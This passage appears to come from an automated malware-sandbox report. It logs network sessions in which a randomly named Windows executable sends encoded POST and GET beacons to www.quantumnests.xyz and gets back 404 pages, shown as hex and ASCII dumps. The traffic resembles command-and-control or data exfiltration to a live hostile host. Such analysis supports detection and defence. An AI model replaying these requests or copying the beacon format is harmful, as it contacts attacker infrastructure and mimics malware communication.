                                                  Sep 16, 2024 09:40:04.086962938 CEST224INData Raw: 3d 22 73 74 32 22 20 64 3d 22 4d 2d 34 33 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 34 32 30 2e 32 20 32 38 32 2e
                                                  Data Ascii: ="st2" d="M-430.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-420.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-410.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-400.2 282.4h-3l-6.8 25.2h3z"/>
                                                  Sep 16, 2024 09:40:04.086973906 CEST1236INData Raw: 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 33 39 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22
                                                  Data Ascii: <path class="st2" d="M-390.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-380.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-370.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-360.2 282.4h-3l-6.8 25.2h3z"/>
                                                  Sep 16, 2024 09:40:04.086986065 CEST224INData Raw: 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 31 38 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e
                                                  Data Ascii: 2.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-180.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-170.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-160.2 282.4h-3l-6.8 25.2h3z"/> <path class="st
                                                  Sep 16, 2024 09:40:04.092001915 CEST1236INData Raw: 32 22 20 64 3d 22 4d 2d 31 35 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 31 34 30 2e 32 20 32 38 32 2e 34 68 2d 33
                                                  Data Ascii: 2" d="M-150.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-140.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-130.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-120.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2"


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  22192.168.2.549734162.0.239.141802796C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 16, 2024 09:40:06.052649021 CEST814OUTPOST /vnd3/ HTTP/1.1
                                                  Host: www.quantumnests.xyz
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US
                                                  Connection: close
                                                  Content-Length: 229
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: no-cache
                                                  Origin: http://www.quantumnests.xyz
                                                  Referer: http://www.quantumnests.xyz/vnd3/
                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                  Data Raw: 70 72 75 74 66 52 5f 50 3d 38 61 70 48 36 47 76 48 6c 49 67 68 39 43 77 55 41 53 79 7a 69 73 39 67 6d 35 6c 6c 68 50 6e 49 79 48 50 4e 71 34 6a 71 69 7a 74 43 55 69 57 67 31 75 63 78 47 78 43 7a 38 6e 32 63 6d 6d 79 42 45 51 35 74 39 65 76 6b 35 30 43 69 2f 79 5a 43 55 5a 64 65 51 6c 68 56 68 59 52 31 66 45 70 58 44 74 66 64 64 6c 70 75 4f 50 55 42 69 62 4a 52 6e 77 47 31 4f 2b 64 7a 2f 38 6d 37 59 57 73 46 31 47 79 2f 59 31 39 58 59 6d 63 44 4e 64 62 41 77 34 2f 45 6f 6b 6d 49 63 79 76 43 66 47 39 7a 59 2f 33 30 30 45 74 4a 66 4b 64 48 7a 63 33 71 78 36 35 71 66 70 61 62 34 41 70 52 71 62 35 50 68 6b 62 4d 73 69 33 77 74 6b 4c 4b 54 76 53 35 52 37 67 4f 73 4c 77 41 63 6c 73 68
                                                  Data Ascii: prutfR_P=8apH6GvHlIgh9CwUASyzis9gm5llhPnIyHPNq4jqiztCUiWg1ucxGxCz8n2cmmyBEQ5t9evk50Ci/yZCUZdeQlhVhYR1fEpXDtfddlpuOPUBibJRnwG1O+dz/8m7YWsF1Gy/Y19XYmcDNdbAw4/EokmIcyvCfG9zY/300EtJfKdHzc3qx65qfpab4ApRqb5PhkbMsi3wtkLKTvS5R7gOsLwAclsh


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  23192.168.2.549735162.0.239.141802796C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 16, 2024 09:40:08.594481945 CEST1831OUTPOST /vnd3/ HTTP/1.1
                                                  Host: www.quantumnests.xyz
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US
                                                  Connection: close
                                                  Content-Length: 1245
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: no-cache
                                                  Origin: http://www.quantumnests.xyz
                                                  Referer: http://www.quantumnests.xyz/vnd3/
                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                  Data Raw: 70 72 75 74 66 52 5f 50 3d 38 61 70 48 36 47 76 48 6c 49 67 68 39 43 77 55 41 53 79 7a 69 73 39 67 6d 35 6c 6c 68 50 6e 49 79 48 50 4e 71 34 6a 71 69 7a 31 43 56 51 65 67 6e 39 45 78 48 78 43 7a 2f 6e 32 66 6d 6d 79 51 45 51 68 70 39 66 54 53 35 78 47 69 2b 55 56 43 42 59 64 65 61 6c 68 56 73 34 52 6f 43 30 70 34 44 73 7a 5a 64 68 4e 75 4f 50 55 42 69 64 74 52 67 69 2b 31 4d 2b 64 38 2b 38 6d 6e 53 32 73 68 31 47 62 43 59 31 35 59 59 58 38 44 4e 39 72 41 78 4f 44 45 71 45 6d 4b 66 79 76 4b 66 47 68 73 59 2f 36 4e 30 46 5a 77 66 4e 70 48 79 34 69 44 6c 5a 38 79 4f 70 4b 30 39 77 52 50 32 2b 38 69 6b 6e 54 72 76 78 66 72 67 57 50 6f 59 6f 37 30 59 59 30 46 79 4e 45 61 59 30 74 54 6d 43 73 66 48 43 70 46 4a 65 35 56 67 43 6e 31 2b 6c 30 71 50 2f 47 42 68 58 36 61 4a 64 6f 2b 5a 4d 4a 4a 45 78 31 4c 6a 5a 53 4d 39 4f 2f 4c 46 6d 59 68 43 30 72 45 74 59 6a 4f 48 69 71 4a 37 34 6a 36 57 52 42 46 4d 38 52 43 67 42 46 66 34 46 34 61 6a 4e 53 6c 41 4c 36 4f 32 59 6e 70 49 54 61 6e 74 66 4d 6d 54 72 2b 59 71 [TRUNCATED]
                                                  Data Ascii: prutfR_P=8apH6GvHlIgh9CwUASyzis9gm5llhPnIyHPNq4jqiz1CVQegn9ExHxCz/n2fmmyQEQhp9fTS5xGi+UVCBYdealhVs4RoC0p4DszZdhNuOPUBidtRgi+1M+d8+8mnS2sh1GbCY15YYX8DN9rAxODEqEmKfyvKfGhsY/6N0FZwfNpHy4iDlZ8yOpK09wRP2+8iknTrvxfrgWPoYo70YY0FyNEaY0tTmCsfHCpFJe5VgCn1+l0qP/GBhX6aJdo+ZMJJEx1LjZSM9O/LFmYhC0rEtYjOHiqJ74j6WRBFM8RCgBFf4F4ajNSlAL6O2YnpITantfMmTr+YqTo3SDz9lsN6iqdORcNMmChTTwwsS5kc52d1r+vurRroeqnNpGGvhJBZSIOpEPgoBeTtaApmNcoqg1Pf7EB1dbFRhVUOYgG0+XFpd8Eou8WSg6qOntoxdTSmCxw8ToLDEV/qM+50weRE3GdwoTstcAQ43LqH5uLr2dCcco95TYmYYh/Zv6EDx1suJSOrKgnLVJ1PTL6E7rTXkNLuWKDlK+xsLegKbdxvHm2Te7fMlhXGDrE+zlP9AS/InU0plb1ZmZh4ZVzU47RNW2bRO9joW3a8rMFMbLVuUugsauNaMVq0beDboJwbzPxrWJHmLjLoombhDccNd+pP/RcfBSA4od1KcAAXc+4GFcIc+Jr1dmc2eZr5xz2oP+rqzjTAkOmqRqDQBHf+OPFmzoufGfNdfbOTJvEidDwE1FZz3BZswZsQYWdpvolZsHCCqeNuM5hhWdS3ZMnczqIHYswFc/8AE06MjVMh03vJxR6iGatOQnkad+Qga2ZWGFwg0of3XPF4YM6vbIe1NeodMqXxOiHBtYaLJuOT0JDw4uCmp2QxNElPsQ1q5IhEtyLbrkKyeF4GkW4S7rHCW36QsrU5lTZg/ptpNn7MymP6wr5xAJQ44BNkgi8Xm4yKP2Xyl+nipB75Tp1F141TVIrzoQVTtcue+btdmm8fpWKXwYs [TRUNCATED]
                                                  Sep 16, 2024 09:40:10.208085060 CEST1236INHTTP/1.1 404 Not Found
                                                  Date: Mon, 16 Sep 2024 07:40:09 GMT
                                                  Server: Apache
                                                  Content-Length: 18121
                                                  Connection: close
                                                  Content-Type: text/html
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 3c 64 69 76 3e 0a 20 20 20 20 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 30 30 20 33 35 35 22 3e 0a 20 20 3c 67 20 69 64 3d 22 6f 63 65 61 6e 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 73 6b 79 22 20 63 6c 61 73 73 3d 22 73 74 30 22 [TRUNCATED]
                                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="/404style.css"></head><body>... partial:index.partial.html --><div class="main"> <div> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1000 355"> <g id="ocean"> <path id="sky" class="st0" d="M0 0h1000v203.1H0z"/> <linearGradient id="water_1_" gradientUnits="userSpaceOnUse" x1="500" y1="354" x2="500" y2="200.667"> <stop offset="0" stop-color="#fff"/> <stop offset="1" stop-color="#b3dcdf"/> </linearGradient> <path id="water" fill="url(#water_1_)" d="M0 200.7h1000V354H0z"/> <path id="land" class="st0" d="M0 273.4h1000V354H0z"/> <g id="bumps"> <path class="st0" d="M0 275.2s83.8-28 180-28 197 28 197 28H0z"/> <path class="st0" d="M377 275.2s54.7-28 117.5-28 128.6 28 128.6 28H377z"/> <path class="st0" d="M623.2 275.2s83.7-28 179.9-28 196.9 28 196.9 28H623.2z"/> <path class="st0" d="M-998 275.2s83.8-28 180 [TRUNCATED]
                                                  Sep 16, 2024 09:40:10.208101988 CEST224INData Raw: 35 2d 32 38 20 31 32 38 2e 36 20 32 38 20 31 32 38 2e 36 20 32 38 48 2d 36 32 31 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 2d 33 37 34 2e 38 20 32 37 35 2e 32 73 38 33 2e 37 2d 32 38 20 31
                                                  Data Ascii: 5-28 128.6 28 128.6 28H-621z"/> <path class="st0" d="M-374.8 275.2s83.7-28 179.9-28S2 275.2 2 275.2h-376.8z"/> </g> </g> <g id="tracks"> <path class="st2" d="M9.8 282.4h-3L0 307.6h3z"/> <path class="st2
                                                  Sep 16, 2024 09:40:10.208112955 CEST1236INData Raw: 22 20 64 3d 22 4d 31 39 2e 38 20 32 38 32 2e 34 68 2d 33 4c 31 30 20 33 30 37 2e 36 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 32 39 2e 38 20 32 38 32 2e 34 68 2d 33 4c 32 30 20 33 30 37 2e
                                                  Data Ascii: " d="M19.8 282.4h-3L10 307.6h3z"/> <path class="st2" d="M29.8 282.4h-3L20 307.6h3z"/> <path class="st2" d="M39.8 282.4h-3L30 307.6h3z"/> <path class="st2" d="M49.8 282.4h-3L40 307.6h3z"/> <path class="st2" d="M59.8 282.4h-3L50
                                                  Sep 16, 2024 09:40:10.208118916 CEST1236INData Raw: 22 20 64 3d 22 4d 32 33 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 32 34 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38
                                                  Data Ascii: " d="M239.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M249.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M259.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M269.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M279.8 282
                                                  Sep 16, 2024 09:40:10.208122969 CEST1236INData Raw: 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 34 35 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 34
                                                  Data Ascii: <path class="st2" d="M459.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M469.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M479.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M489.8 282.4h-3l-6.8 25.2h3z"/> <path class="
                                                  Sep 16, 2024 09:40:10.208132982 CEST1236INData Raw: 73 74 32 22 20 64 3d 22 4d 38 33 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 38 32 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20
                                                  Data Ascii: st2" d="M830 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M820 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M810 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M800 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M790 282.4h-3l-
                                                  Sep 16, 2024 09:40:10.208137989 CEST1236INData Raw: 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 36 30 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73
                                                  Data Ascii: 25.2h3z"/> <path class="st2" d="M600 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M590 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M580 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M570 282.4h-3l-6.8 25.2h3z"/> <path c
                                                  Sep 16, 2024 09:40:10.208148003 CEST1120INData Raw: 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 33 33 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20
                                                  Data Ascii: -3l-6.8 25.2h3z"/> <path class="st2" d="M-330.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-320.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-310.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-300.2 282.4h-3l
                                                  Sep 16, 2024 09:40:10.208168983 CEST1236INData Raw: 32 22 20 64 3d 22 4d 2d 31 35 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 31 34 30 2e 32 20 32 38 32 2e 34 68 2d 33
                                                  Data Ascii: 2" d="M-150.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-140.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-130.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-120.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2"
                                                  Sep 16, 2024 09:40:10.208178997 CEST1236INData Raw: 64 3d 22 4d 34 35 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 34 34 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e
                                                  Data Ascii: d="M450 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M440 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M430 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M420 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M410 282.4h-
                                                  Sep 16, 2024 09:40:10.208189011 CEST1236INData Raw: 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 32 33 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 32 32 30
                                                  Data Ascii: <path class="st2" d="M230 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M220 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M210 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M200 282.4h-3l-6.8 25.2h3z"/> <path class="st
                                                  Sep 16, 2024 09:40:10.208203077 CEST1236INHTTP/1.1 404 Not Found
                                                  Date: Mon, 16 Sep 2024 07:40:09 GMT
                                                  Server: Apache
                                                  Content-Length: 18121
                                                  Connection: close
                                                  Content-Type: text/html
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 3c 64 69 76 3e 0a 20 20 20 20 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 30 30 20 33 35 35 22 3e 0a 20 20 3c 67 20 69 64 3d 22 6f 63 65 61 6e 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 73 6b 79 22 20 63 6c 61 73 73 3d 22 73 74 30 22 [TRUNCATED]
                                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="/404style.css"></head><body>... partial:index.partial.html --><div class="main"> <div> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1000 355"> <g id="ocean"> <path id="sky" class="st0" d="M0 0h1000v203.1H0z"/> <linearGradient id="water_1_" gradientUnits="userSpaceOnUse" x1="500" y1="354" x2="500" y2="200.667"> <stop offset="0" stop-color="#fff"/> <stop offset="1" stop-color="#b3dcdf"/> </linearGradient> <path id="water" fill="url(#water_1_)" d="M0 200.7h1000V354H0z"/> <path id="land" class="st0" d="M0 273.4h1000V354H0z"/> <g id="bumps"> <path class="st0" d="M0 275.2s83.8-28 180-28 197 28 197 28H0z"/> <path class="st0" d="M377 275.2s54.7-28 117.5-28 128.6 28 128.6 28H377z"/> <path class="st0" d="M623.2 275.2s83.7-28 179.9-28 196.9 28 196.9 28H623.2z"/> <path class="st0" d="M-998 275.2s83.8-28 180 [TRUNCATED]
                                                  Sep 16, 2024 09:40:10.208395004 CEST1236INHTTP/1.1 404 Not Found
                                                  Date: Mon, 16 Sep 2024 07:40:09 GMT
                                                  Server: Apache
                                                  Content-Length: 18121
                                                  Connection: close
                                                  Content-Type: text/html
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 3c 64 69 76 3e 0a 20 20 20 20 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 30 30 20 33 35 35 22 3e 0a 20 20 3c 67 20 69 64 3d 22 6f 63 65 61 6e 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 73 6b 79 22 20 63 6c 61 73 73 3d 22 73 74 30 22 [TRUNCATED]
                                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="/404style.css"></head><body>... partial:index.partial.html --><div class="main"> <div> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1000 355"> <g id="ocean"> <path id="sky" class="st0" d="M0 0h1000v203.1H0z"/> <linearGradient id="water_1_" gradientUnits="userSpaceOnUse" x1="500" y1="354" x2="500" y2="200.667"> <stop offset="0" stop-color="#fff"/> <stop offset="1" stop-color="#b3dcdf"/> </linearGradient> <path id="water" fill="url(#water_1_)" d="M0 200.7h1000V354H0z"/> <path id="land" class="st0" d="M0 273.4h1000V354H0z"/> <g id="bumps"> <path class="st0" d="M0 275.2s83.8-28 180-28 197 28 197 28H0z"/> <path class="st0" d="M377 275.2s54.7-28 117.5-28 128.6 28 128.6 28H377z"/> <path class="st0" d="M623.2 275.2s83.7-28 179.9-28 196.9 28 196.9 28H623.2z"/> <path class="st0" d="M-998 275.2s83.8-28 180 [TRUNCATED]


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  24192.168.2.549736162.0.239.141802796C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 16, 2024 09:40:11.140705109 CEST528OUTGET /vnd3/?prutfR_P=xYBn5zztkuVfiCwoRQOy2opDl7RgoPyR03XK+4rS3g0RcyLb68RvZiy9qVH4+ViXNRgW3ur8wHahmEpIZ6ERRmF7/bt0PBBiFKuaDRgyJqJJ+MxR9VKTQpRM54mqQi17vQ==&u8b=M0MH_xux6 HTTP/1.1
                                                  Host: www.quantumnests.xyz
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Language: en-US
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                  Sep 16, 2024 09:40:11.717657089 CEST1236INHTTP/1.1 404 Not Found
                                                  Date: Mon, 16 Sep 2024 07:40:11 GMT
                                                  Server: Apache
                                                  Content-Length: 18121
                                                  Connection: close
                                                  Content-Type: text/html; charset=utf-8
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 3c 64 69 76 3e 0a 20 20 20 20 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 30 30 20 33 35 35 22 3e 0a 20 20 3c 67 20 69 64 3d 22 6f 63 65 61 6e 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 73 6b 79 22 20 63 6c 61 73 73 3d 22 73 74 30 22 [TRUNCATED]
